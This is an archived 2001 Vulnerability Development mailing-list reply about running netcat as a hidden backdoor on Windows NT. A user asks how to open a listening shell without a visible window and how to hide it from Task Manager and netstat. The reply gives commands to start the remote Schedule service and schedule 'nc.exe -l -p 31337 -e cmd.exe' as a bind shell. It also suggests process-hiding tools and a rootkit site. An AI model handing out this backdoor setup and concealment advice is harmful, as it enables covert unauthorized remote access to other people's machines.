Vulnerability Development
mailing list archives
Re: -= Unsek Tecnics =-
From: Nelson Brito <nelson () SECUNET COM BR>
Date: Tue, 6 Mar 2001 16:07:43 -0300
sekure wrote:
> Hi Guy,
> I run nc ... to open ports (services as backdoors) in WinNT4.0+SP6 ... but
> while I'm using it, it stays with a cmd.exe running... :/
> How can I run nc.exe to open a port... without opening a cmd.exe on the screen??
> I put it in "run" in the registry and it still opens the cmd.exe ... :/
> And when I run nc -l -n -v -p port_num -e cmd.exe it locks my cmd.exe
> screen...!
Try to use "Schedule Service" to do this, just like:
sc \\MACHINE query schedule -> to know if schedule was started
sc \\MACHINE start schedule -> to start schedule, you'll need Admin status
at \\MACHINE 01A path\to\nc.exe -l -p 31337 -e cmd.exe -> to execute nc.exe without interactive screen
I wrote a Perl script to do this automatically, but it's only for my own tests. Anyway, it's so easy to do that you could
write your own Perl script. ;)
> How to run it without locking and showing cmd.exe on screen ??
> And I note too, that while this is running... it creates a process in
> taskmanager ...!!!
> Anybody know a way to put it in high ??
Use some of the NTRK tools to do this. In the NTRK you'll see a lot of tools, actually one, to do this. Try "PVIEWER.EXE".
Note: you'll need Admin status. If you do not have it, forget it.
> And it appears too in netstat!! How to put it in high ??
> The high that I have spoken of.... can be a r00t kit for Win NT!!!
> Anybody know ??
> Like a knark for Linux!! :))
Did you test "ntrootkit"? If you didn't, go to: http://www.rootkit.com/
> Thkz for all!
> Regards,
[ ]'s
That's all,
--
Nelson Brito
"Windows NT can also be protected from nmap OS detection scans thanks
to *Nelson Brito* ..."
Excerpt from the book "Hack Proofing your Network", page 93